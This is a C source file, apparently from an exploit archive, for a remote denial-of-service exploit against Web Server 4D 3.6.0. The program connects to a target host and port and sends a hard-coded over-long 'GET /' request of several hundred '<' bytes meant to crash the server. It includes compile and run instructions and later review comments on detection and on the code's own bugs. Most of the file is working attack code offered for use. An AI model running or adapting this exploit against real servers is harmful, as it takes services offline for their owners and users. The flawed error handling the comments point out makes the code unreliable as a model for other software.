Web server 4D 3.6.0 remote DOS exploit.
9ecb021967a204a4e0c6a30ce25bba730abc3141dc7ffad2d9d627831ae2f3b7
/* Web server 4D 3.6.0 denial of service */
/* bug found by badpack3t. */
/* ftp://ftp.mdgcs.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe */
/* */
/* $ gcc -o f_ws4d f_ws4d.c (linux version) */
/* $ gcc -o f_ws4d f_ws4d.c -DWINDOWS (windows version) */
/* */
/* $ ./f_ws4d <hostname/ip> <port> */
/* */
/* Federico Fazzi <federico@autistici.org> */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#if WINDOWS
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
/* Forward declaration; usage() is defined after main(). */
int usage(char *f);
/*
 * Fixed request that main() writes to the target, stored as hex escapes.
 * Decoded, it is the ASCII text "GET /" followed by a run of several hundred
 * (about 450) '<' (0x3C) bytes and then " HTTP/1.1 " (with a trailing space).
 * No CR/LF and no header lines follow the request line.
 *
 * For detection: the traffic is a single over-long request URI consisting of
 * one repeated character, so a request-line or URI length limit in front of
 * the affected server would reject it before the server parses it.
 * NOTE(review): the page does not say why the server fails on this input or
 * which release corrects it; confirm both against the vendor's advisory.
 */
char f_call[] =
"\x47\x45\x54\x20\x2F\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C"
"\x3C\x3C\x3C\x3C\x3C\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\x20";
/*
 * Proof-of-concept client: resolves argv[1], opens one TCP connection to it
 * on the port taken from argv[2], writes the fixed f_call buffer once, prints
 * a status line and closes the socket. It never reads a reply from the peer.
 *
 * Returns 0 after the write succeeds, -1 if WSAStartup fails (WINDOWS build),
 * and calls exit(1) when socket(), connect() or write() fails.
 */
int main(int argc, char *argv[]) {
#if WINDOWS
WSADATA wsaData;
WORD wVersionRequested;
int port;
int size;
SOCKET sockfd;
#else
int sockfd;
socklen_t size;
/* NOTE(review): argv[2] is read here, before argc is checked below, and
   atoi() reports neither malformed nor out-of-range input. */
in_port_t port = atoi(argv[2]);
#endif
struct sockaddr_in structaddr;
struct hostent *sockhost;
/* NOTE(review): this 512-byte buffer is never used or freed in main(), and
   the malloc() result is not checked. */
char *reply = (char *)malloc(512);
/* NOTE(review): usage()'s return value is discarded, so execution continues
   past this line even when the check fires; the check also accepts
   argc == 2 although the header comment documents two arguments. basename()
   is called without <libgen.h> among the includes shown on this page. */
if(argc < 2) usage((char *) basename(argv[0]));
#if WINDOWS
/* Ask Winsock for version 1.1 before any socket call. */
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
#endif
printf("* Webserver 4D 3.6.0 denial of service\n\n");
#if WINDOWS
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
INVALID_SOCKET) {
perror("socket_func");
exit(1);
}
#else
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket_func");
exit(1);
}
#endif
printf("getting socket.. done!\n");
sockhost = gethostbyname(argv[1]);
/* NOTE(review): a failed lookup is only reported; sockhost is still
   dereferenced by the bcopy() call below. */
if(sockhost == NULL) herror("gethostbyname_func");
size = sizeof(structaddr);
memset((void *) &structaddr, 0x00, size);
/* Copy the first resolved address into the destination sockaddr. */
bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length);
structaddr.sin_family = AF_INET;
structaddr.sin_port = htons((u_short)port);
printf("getting connection.. ");
if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) {
printf("error!\n");
perror("connect_func");
exit(1);
}
printf("done!\n");
printf("sending exploit in hex format.. ");
/* sizeof(f_call) counts the array's terminating NUL, so one 0x00 byte
   follows the request text on the wire; a short write is not detected. */
if(write(sockfd, f_call, sizeof(f_call)) == -1) {
printf("error!\n");
perror("send_func");
exit(1);
}
printf("done!\n");
/* This message is printed whenever write() did not fail; nothing here checks
   the target's state, so the tool's output is not evidence of impact. */
printf("target: %s on port %d have been dossed!\n\n",
sockhost->h_name, port);
#if WINDOWS
closesocket(sockfd);
#else
close(sockfd);
#endif
return(0);
}
/*
 * Print the tool banner, the author line and the two build command lines to
 * stdout, using f as the output binary name and __FILE__ as the source name.
 * Always returns 1.
 */
int usage(char *f) {
    const char *source_name = __FILE__;

    fputs("Webserver 4D 3.6.0 denial of service\n", stdout);
    fputs("Federico Fazzi <federico@autistici.org\n\n", stdout);
    fprintf(stdout, "$ gcc -o %s %s (linux version)\n", f, source_name);
    fprintf(stdout, "$ gcc -o %s %s -DWINDOWS (windows version\n", f, source_name);
    return 1;
}